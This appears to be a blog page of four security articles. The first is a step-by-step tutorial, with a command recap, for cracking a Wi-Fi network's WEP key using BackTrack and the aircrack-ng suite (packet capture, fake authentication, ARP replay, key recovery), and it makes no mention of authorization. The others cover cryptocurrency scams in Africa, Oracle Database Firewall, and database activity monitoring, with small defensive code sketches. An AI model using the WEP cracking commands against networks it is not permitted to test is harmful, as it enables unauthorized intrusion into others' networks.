
Database Security

Hacking WEP Encryption Algorithm

Izunna Okpala



Hacking WEP
  1. Use Linux. Standard Windows drivers don’t support the monitor mode and packet injection needed to attack WEP, but you can boot Linux from a bootable CD without installing anything.
  2. Get a packet-sniffing toolkit. BackTrack, a Linux distribution that bundles the aircrack-ng suite, is a commonly used option. Download the ISO image and burn it to a bootable CD/DVD.
  3. Boot into BackTrack from your CD/DVD. The operating system does not need to be installed on the hard drive – which also means that whenever you shut BackTrack down, all your data is lost.
  4. Select a start-up option. A boot menu appears after booting; change the option with the up and down arrow keys and select one. This tutorial uses the first option.
  5. Load the graphical interface. With this option BackTrack starts at a command prompt; type the command startx to continue.
  6. Click the terminal button at the bottom left. It’ll be the fifth option.
  7. Wait for the Linux command terminal to open.
  8. View your wireless interface. Enter the following command: “airmon-ng” (without quotes). You should see an interface such as wlan0 listed beneath Interface.
  9. Get all the required information for the access point. Enter the following command: “airodump-ng wlan0” (without quotes). You should get three things:
    • BSSID
    • Channel
    • ESSID (AP Name)
    • Here’s what the tutorial case turned up:
      • BSSID: 00:17:3F:76:36:6E
      • Channel: 1
      • ESSID (AP Name): Suleman
  10. Start capturing packets from the access point. This one will use the example information above, but you should plug in your own. Command: “airodump-ng -w wep -c 1 --bssid 00:17:3F:76:36:6E wlan0” (without quotes). The -w wep option sets the capture file prefix.
  11. Allow setup to start.
  12. Open a new terminal window. Type the following command, substituting your own BSSID: “aireplay-ng -1 0 -a 00:17:3F:76:36:6E wlan0” (without quotes). This performs a fake authentication with the access point.
  13. Open another new terminal window. Type the following command: “aireplay-ng -3 -b 00:17:3F:76:36:6E wlan0” (without quotes). This replays captured ARP requests to generate traffic.
  14. Allow setup to start.
  15. Go back to the first terminal window.
  16. Allow the data count (#Data) in this window to reach 30,000 or above. This takes 15 to 60 minutes (or more) depending on wireless signal, hardware, and load on the access point.
  17. Go to the third terminal window and press Ctrl + c.
  18. List the capture files. Type the following command: “dir” (without quotes). This shows the files saved during the capture.
  19. Use a cap file. For the example, it would be the following: “aircrack-ng wep-02.cap” (without quotes) – the file name comes from the -w wep prefix set earlier. The cracking run will start.
  20. Read off the WEP key. When the run completes, aircrack-ng prints the recovered key. In this example, it was {ADA2D18D2E}.
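Taken together, the walkthrough boils down to a short aircrack-ng command sequence. The listing below recaps it with the tutorial’s example interface, channel, and BSSID – substitute your own values, and note that capture file names like wep-02.cap depend on the -w prefix and on how many captures you have already run:

```shell
airmon-ng                                                  # list wireless interfaces
airodump-ng wlan0                                          # find BSSID, channel, ESSID
airodump-ng -w wep -c 1 --bssid 00:17:3F:76:36:6E wlan0    # capture IVs to wep-*.cap
aireplay-ng -1 0 -a 00:17:3F:76:36:6E wlan0                # fake authentication
aireplay-ng -3 -b 00:17:3F:76:36:6E wlan0                  # ARP replay to generate traffic
aircrack-ng wep-02.cap                                     # recover the key from the capture
```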

Database Security

The proliferation of digital currencies in Africa calls for stronger security measures

Izunna Okpala



The advantages of cryptocurrencies in Africa are also being exploited as cyber criminals become increasingly technically skilled.

Virtual currency-related crime has increased in Africa, especially in South Africa, with hackers hijacking people’s phones to mine cryptocurrencies. As the popularity of crypto-assets such as bitcoin grows, various agencies have begun reviewing the consumer impact of the crypto-sector and its implications for personal financial security.

Paxful handles more than 50,000 trades a day across three million wallets worldwide, with South Africa being one of its top markets. The fluctuating value of the world’s most popular digital currency has not dissuaded South Africans either: this month Paxful reported a 2,800 percent increase in South African trades compared to October 2018. Johannesburg, Pretoria, and Cape Town are the three cities contributing the most users. Overall, Paxful also noted that the number of trades across the African continent has risen by 64 percent over the same period.

Importance and transparency of increased security

While the vast majority of cryptocurrency trades are secure, the market has not been entirely resistant to scams and fraudulent transactions in recent years. With the cryptocurrency industry still quite new, scammers prey on users who lack the appropriate awareness in this space.

Marius Reitz, South Africa country manager for cryptocurrency wallet Luno, said that while cryptocurrencies like Bitcoin were used for illicit activity, the situation is improving as law enforcement agencies get better at tracking transactions; online scams, however, are still common.

The most popular form of digital currency scam is phishing, in which criminals use a legitimate-looking (but fake) website, email, or SMS to trick you into handing over passwords or account details, Reitz said.

“Bitcoin is secure, but sometimes how users handle it is not. Users must treat Bitcoin as cash and protect their personal information and passwords just as they do when using an ATM or shopping online. Once your bitcoin is in the possession of hackers and scammers the loss is irreversible, so it’s important to have the required safeguards in place,” adds Ray Youssef, Paxful’s co-founder and CEO.

On Paxful, users are protected from scammers by various security measures, including Paxful’s escrow service, which keeps the bitcoin safe until a transaction is completed.

Protecting Your Cryptocurrency Assets

Youssef concludes: “For more and more people around the world, P2P finance is their only hope of financial inclusion and empowerment. While the risk of crypto fraud and theft cannot be completely eliminated, you can significantly reduce your chances of becoming a target by following Paxful’s top tips for safe trading and taking a few simple precautions.”


Database Security

Understanding Oracle Database Firewall

Izunna Okpala




Despite what Oracle calls it, this is a Database Activity Monitoring product at its core. Just one with more of a security focus than audit/compliance, and based on network monitoring (it lacks local activity monitoring, which is why it’s weaker for compliance).

  1. Many other DAM products can also block, and Secerno can also monitor. I always thought it was an interesting product.
  2. Most DAM products include network monitoring as an option. The real difference with Secerno is that they focused far more on the security side of the market, even though historically that segment is much smaller than the audit/monitoring/compliance side. So Oracle has more focus on blocking, and less on capturing and storing all activity.
  3. It is not a substitute for Database Activity Monitoring products, nor is it “better” as Oracle claims. It is a form of DAM, but – as competitors mentioned in the article – you still need multiple local monitoring techniques to handle direct access; network monitoring alone isn’t enough. I’m sure Oracle Services will be more than happy to connect Secerno and Oracle Audit Vault to do this for you.
  4. Secerno basically whitelists queries (automatically) and can block unexpected activity. This appears to be pretty effective for database attacks, although I haven’t talked to any pen testers who have gone up against it. (They do also blacklist, but the whitelist is the main secret sauce).
  5. Secerno had the F5 partnership before the Oracle acquisition. It allowed you to set WAF rules based on something detected in the database (e.g., block a signature or host IP). I’m not sure if they have expanded this post-acquisition. Imperva is the only other vendor that I know of to integrate DAM/WAF.
  6. Oracle generally believes that if you don’t use their products you are either a certified idiot or criminally negligent. Neither is true, and while this is a good product I still recommend you look at all the major competitors to see what fits you best. Ignore the marketing claims.
  7. Odds are your DBA will buy this when you aren’t looking, as part of some bundle deal. If you think you need DAM for security, compliance, or both, start an assessment process or talk to them before you get a call one day asking you to start handling incidents.
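The automatic query whitelisting described in point 4 can be made concrete with a toy sketch: reduce each query to its structural “shape” by stripping out literals, learn the shapes seen during a baseline period, and flag anything unfamiliar. This is a simplified illustration of the general technique, not Secerno’s actual engine (which parses SQL far more thoroughly); all names below are invented.

```python
import re

def normalize(query: str) -> str:
    """Reduce a SQL statement to its structural 'shape' by stripping literals."""
    q = query.strip().lower()
    q = re.sub(r"'[^']*'", "?", q)   # string literals -> placeholder
    q = re.sub(r"\b\d+\b", "?", q)   # numeric literals -> placeholder
    q = re.sub(r"\s+", " ", q)       # collapse whitespace
    return q

class QueryWhitelist:
    """Learn query shapes during a baseline period; flag anything unfamiliar."""
    def __init__(self):
        self.allowed = set()

    def learn(self, query: str) -> None:
        self.allowed.add(normalize(query))

    def is_allowed(self, query: str) -> bool:
        return normalize(query) in self.allowed

# Baseline: the application only ever runs this parameterized lookup.
wl = QueryWhitelist()
wl.learn("SELECT name FROM users WHERE id = 42")

print(wl.is_allowed("SELECT name FROM users WHERE id = 99"))        # True  (same shape)
print(wl.is_allowed("SELECT name FROM users WHERE id = 1 OR 1=1"))  # False (injected tail)
```

Note how the injected `OR 1=1` changes the query’s shape rather than just its parameters, which is why structural whitelisting catches it without a signature.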

In other words: a good product with advantages and disadvantages, just like anything else. More security than compliance, but like many DAM tools it offers some of both. Ignore the hype, figure out your needs, and evaluate to figure out which tool fits best. You aren’t a bad person if you don’t buy Oracle, no matter what your sales rep tells your CIO.

And seriously – watch out for the deal bundling. If you haven’t learned anything from us about database security by now, hopefully you at least realize that DBAs and security don’t always talk as much as they should (the same goes for Guardium/IBM). If you need to be involved in any database security, start talking to the DBAs now, before it’s too late.


Database Security

Understanding and Selecting DSP: Data and Event Collection

Izunna Okpala




One of its central aspects is the evolution of event collection mechanisms from native audit, to monitoring network activity, to agent-based activity monitoring. These are all database-specific information sources. The evolution of DAM has been framed by these different methods of data collection. That’s important, because what you can do is highly dependent on the data you can collect. For example, the big reason agents are the dominant collection model is that you need them to monitor administrators – network monitoring can’t do that (and is quite difficult in distributed environments).

The development of DAM into DSP also entails examination of a broader set of application-related events. By augmenting the data collection agents we can examine other applications in addition to databases – even including file activity. This means that it has become possible to monitor SAP and Oracle application events – in real time. It’s possible to monitor user activity in a Microsoft SharePoint environment, regardless of how data is stored. We can even monitor file-based non-relational databases. We can perform OS, application, and database assessments through the same system.

A slight increase in the scope of data collection means much broader application-layer support. Not that you necessarily need it – sometimes you want a narrow database focus, while other times you will need to cast a wider net. We will describe all the options to help you decide which best meets your needs.

Let’s take a look at some of the core data collection methods used by customers today:

Event Sources

Local OS/Protocol Stack Agents: A software ‘agent’ is installed on the database server to capture SQL statements as they are sent to the databases. The events captured are returned to the remote Database Security Platform. Events may optionally be inspected locally by the agent for real-time analysis and response. The agents are either deployed into the host’s network protocol stack or embedded into the operating system, to capture communications to and from the database. They see all external SQL queries sent to the database, including their parameters, as well as query results. Most critically, they should capture administrative activity from the console that does not come through normal network connections. Some agents provide an option to block malicious activity – either by dropping the query rather than transmitting it to the database, or by resetting the suspect user’s database connection.

Most agents embed into the OS in order to gain full session visibility, and so require a system reboot during installation. Early implementations struggled with reliability and platform support problems, causing system hangs, but these issues are now fortunately rare. Current implementations tend to be reliable, with low overhead and good visibility into database activity. Agents are a basic requirement for any DSP solution, as they are a relatively low-impact way of capturing all SQL statements – including those originating from the console and arriving via encrypted network connections.

Performance impact these days is very limited, but you will still want to test before deploying into production.

Network Monitoring: An exceptionally low-impact method of monitoring SQL statements sent to the database. By monitoring the subnet (via network mirror ports or taps) statements intended for a database platform are ‘sniffed’ directly from the network. This method captures the original statement, the parameters, the returned status code, and any data returned as part of the query operation. All collected events are returned to a server for analysis. Network monitoring has the least impact on the database platform and remains popular for monitoring less critical databases, where capturing console activity is not required.

Lately the line between network monitoring capabilities and local agents has blurred. Network monitoring is now commonly deployed via a local agent monitoring network traffic on the database server itself, thereby enabling monitoring of encrypted traffic. Some of these ‘network’ monitors still miss console activity – specifically privileged user activity. On a positive note, installation as a user process does not require a system reboot or cause adverse system-wide side effects if the monitor crashes unexpectedly. Users still need to verify that the monitor is collecting database response codes, and should determine exactly which local events are captured, during the evaluation process.

Memory Scanning: Memory scanners read the active memory structures of a database engine, monitoring new queries as they are processed. Deployed as an agent on the database platform, the memory scanning agent activates at pre-determined intervals to scan for SQL statements. Most memory scanners immediately analyze queries for policy violations – even blocking malicious queries – before returning results to a central management server. There are numerous advantages to memory scanning, as these tools see every database operation, including all stored procedure execution. Additionally, they do not interfere with database operations.

You’ll need to be careful when selecting a memory scanning product – the quality of the various products varies. Most vendors only support memory scanning on select Oracle platforms – and do not support IBM, Microsoft, or Sybase. Some vendors don’t capture query variables – only the query structure – limiting the usefulness of their data. And some vendors still struggle with performance, occasionally missing queries. But other memory scanners are excellent enterprise-ready options for monitoring events and enforcing policy.

Database Audit Logs: Database Audit Logs are still commonly used to collect database events. Most databases have native auditing features built in; they can be configured to generate an audit trail that includes system events, transactional events, user events, and other data definitions not available from any other sources. The stream of data is typically sent to one or more locations assigned by the database platform, either in a file or within the database itself. Logging can be implemented through an agent, or logs can be queried remotely from the DSP platform using SQL.

Audit logs are preferred by some organizations because they provide a series of database events from the perspective of the database. The audit trail reconciles database rollbacks, errors, and uncommitted statements – producing an accurate representation of changes made. But the downsides are equally serious. Historically, audit performance was horrible. While the database vendors have improved audit performance and capabilities, and DSP vendors provide great advice for tuning audit trails, bias against native auditing persists. And frankly, it’s easy to mess up audit configurations. Additionally, the audit trail is not really intended to collect SELECT statements – viewing data – but is focused on changes to data or the database system. Finally, as the audit trail is stored and managed on the database platform, it competes heavily for database resources – much more than other data collection methods. But given the accuracy of this data, and its ability to collect internal database events not available to network and OS agent options, audit remains a viable – if not essential – event collection option.

One advantage of using a DSP tool in conjunction with native logs is that it is easier to securely monitor administrator activity. Admins can normally disable or modify audit logs, but a DSP tool may mitigate this risk.
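The “logs queried remotely over SQL” collection model described above boils down to checkpoint-based polling. Here is a minimal sketch using SQLite as a stand-in; real platforms expose their own audit views, and the table and column names below are invented for illustration, but the pattern is the same:

```python
import sqlite3

# Stand-in for a native audit trail (schema invented for illustration).
conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE audit_trail (
    event_id INTEGER PRIMARY KEY,
    db_user  TEXT,
    action   TEXT,
    stmt     TEXT)""")
conn.executemany(
    "INSERT INTO audit_trail (db_user, action, stmt) VALUES (?, ?, ?)",
    [("app", "UPDATE", "UPDATE accounts SET balance = balance - 100"),
     ("dba", "DROP",   "DROP TABLE audit_tmp")])

def collect_since(conn, last_event_id):
    """Pull only events newer than the last checkpoint, as a remote DSP
    collector polling the audit trail over a normal SQL connection would."""
    return conn.execute(
        "SELECT event_id, db_user, action FROM audit_trail WHERE event_id > ?",
        (last_event_id,)).fetchall()

events = collect_since(conn, 0)         # first poll returns both events
checkpoint = events[-1][0]              # remember the highest event_id seen
print(collect_since(conn, checkpoint))  # -> [] until new activity is audited
```

The checkpoint is what lets the collector run on a schedule without re-reading (or missing) events between polls.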

Discovery and Assessment Sources

Network Scans: Most DSP platforms offer database discovery capabilities, either through passive network monitoring for SQL activity or through active TCP scans of open database ports. Additionally, most customers use remote credentialed scanning of internal database structures for data discovery, user entitlement reporting, and configuration assessment. None of these capabilities are new, but remote scanning with read-only user credentials is the standard data collection method for preventative security controls.
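The active TCP-scan half of discovery is straightforward to sketch. This toy version assumes targets sit on their default ports – a production scan would also probe configured port ranges and fingerprint the responses:

```python
import socket

# Default listener ports for common database platforms (assumption: defaults
# in use; a production scan should also cover configured ranges).
DB_PORTS = {1433: "SQL Server", 1521: "Oracle", 3306: "MySQL", 5432: "PostgreSQL"}

def discover(host: str, timeout: float = 0.5):
    """Active discovery: attempt a TCP connect on each well-known database port."""
    found = []
    for port, product in sorted(DB_PORTS.items()):
        try:
            with socket.create_connection((host, port), timeout=timeout):
                found.append((port, product))
        except OSError:
            pass  # closed, filtered, or unreachable
    return found

# Typically prints [] on a machine with no local database listening.
print(discover("127.0.0.1"))
```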

There are many more methods of gathering data and events, but we’re focusing on the most commonly used. If you are interested in more depth on the available options, our blog post on Database Activity Monitoring & Event Collection Options provides much greater detail. For those of you who follow our stuff on a regular basis, there’s not a lot of new information here.

Expanded Collection Sources

A couple of new features broaden the focus of DAM. Here’s what’s new:

File Activity Monitoring: One of the most intriguing recent changes in event monitoring has been the collection of file activity. File Activity Monitoring (FAM) collects all file activity (read, create, edit, delete, etc.) from local file systems and network file shares, analyzes the activity, and – just like DAM – alerts on policy violations. FAM is deployed through a local agent, collecting user actions as they are sent to the operating system. File monitors cross reference requests against Identity and Access Management (e.g., LDAP and Active Directory) to look up user identities. Policies for security and compliance can then be implemented on a group or per-user basis.

This evolution is important for two reasons. The first is that document and data management systems are moving away from strictly relational databases as the storage engine of choice. Microsoft SharePoint, mentioned above, is a hybrid of file management and relational data storage. FAM provides a means to monitor document usage and alert on policy violations. Some customers need to address compliance and security issues consistently, and don’t want to differentiate based on the idiosyncrasies of underlying storage engines, so FAM event collection offers consistent data usage monitoring.

Another interesting aspect of FAM is that most of the databases used for Big Data are non-relational file-based data stores. Data elements are self-describing and self-indexing files. FAM provides the basic capabilities of file event collection and analysis, and we anticipate the extension of these capabilities to cover non-relational databases. While no DSP vendor offers true NoSQL monitoring today, the necessary capabilities are available in FAM solutions.
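Production FAM agents hook the OS at a low level (for example inotify on Linux or filesystem minifilter drivers on Windows) and resolve identities against a directory; the snapshot-diff sketch below is only meant to make the event categories – create, delete, modify – concrete. All names are illustrative.

```python
import tempfile
from pathlib import Path

def snapshot(root):
    """Map each file under root to (size, mtime) so activity can be diffed."""
    return {p: (p.stat().st_size, p.stat().st_mtime_ns)
            for p in Path(root).rglob("*") if p.is_file()}

def diff(before, after):
    """Classify file activity between two snapshots, FAM-style."""
    return {
        "created":  [p for p in after if p not in before],
        "deleted":  [p for p in before if p not in after],
        "modified": [p for p in after
                     if p in before and after[p] != before[p]],
    }

root = tempfile.mkdtemp()
before = snapshot(root)
Path(root, "report.docx").write_bytes(b"draft")   # a user creates a document
activity = diff(before, snapshot(root))
print([p.name for p in activity["created"]])      # ['report.docx']
```

A real agent would then attach the acting user (via LDAP/Active Directory lookup) to each event before evaluating policy, which is where the per-user and per-group enforcement described above comes from.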

Application Monitoring: Databases are used to store application data and persist application state. It’s almost impossible to find a database not serving an application, and equally difficult to find an application that does not use a database. As a result, monitoring the database is often considered sufficient to understand application activity. However, most of you in IT know database monitoring is actually inadequate for this purpose. Applications use hundreds of database queries to support generic forms, connect to databases with generic service accounts, and/or use native application codes to call embedded stored procedures rather than direct SQL queries. Their activity may be too generic, or inaccessible to traditional Database Activity Monitoring solutions. We now see agents designed and deployed specifically to collect application events, rather than database events. For example, SAP transaction codes can be decoded, associated with a specific application user, and then analyzed for policy violations. As with FAM, much of the value comes from better linking of user identity to activities. But extending scope to embrace the application layer directly provides better visibility into application usage and enables more granular policy enforcement.
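A sketch of the kind of application-layer policy this enables, using decoded SAP-style transaction codes. The event format and the specific policy are invented for illustration; the point is that once events carry a real application user (rather than a shared service account), rules like segregation of duties become enforceable:

```python
# Hypothetical decoded application events. Real agents decode transaction
# codes and resolve generic service-account sessions back to named users.
events = [
    {"app_user": "jsmith", "tcode": "FB60", "desc": "enter vendor invoice"},
    {"app_user": "jsmith", "tcode": "F110", "desc": "run payment program"},
    {"app_user": "mjones", "tcode": "FB60", "desc": "enter vendor invoice"},
]

# Segregation-of-duties policy: no single user should both enter invoices
# (FB60) and run the payment program (F110).
SOD_CONFLICTS = [{"FB60", "F110"}]

def sod_violations(events):
    """Group transaction codes by application user and report conflicts."""
    by_user = {}
    for e in events:
        by_user.setdefault(e["app_user"], set()).add(e["tcode"])
    return [(user, sorted(conflict))
            for user, tcodes in by_user.items()
            for conflict in SOD_CONFLICTS
            if conflict <= tcodes]

print(sod_violations(events))   # [('jsmith', ['F110', 'FB60'])]
```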

This article has focused on event collection for monitoring activity.
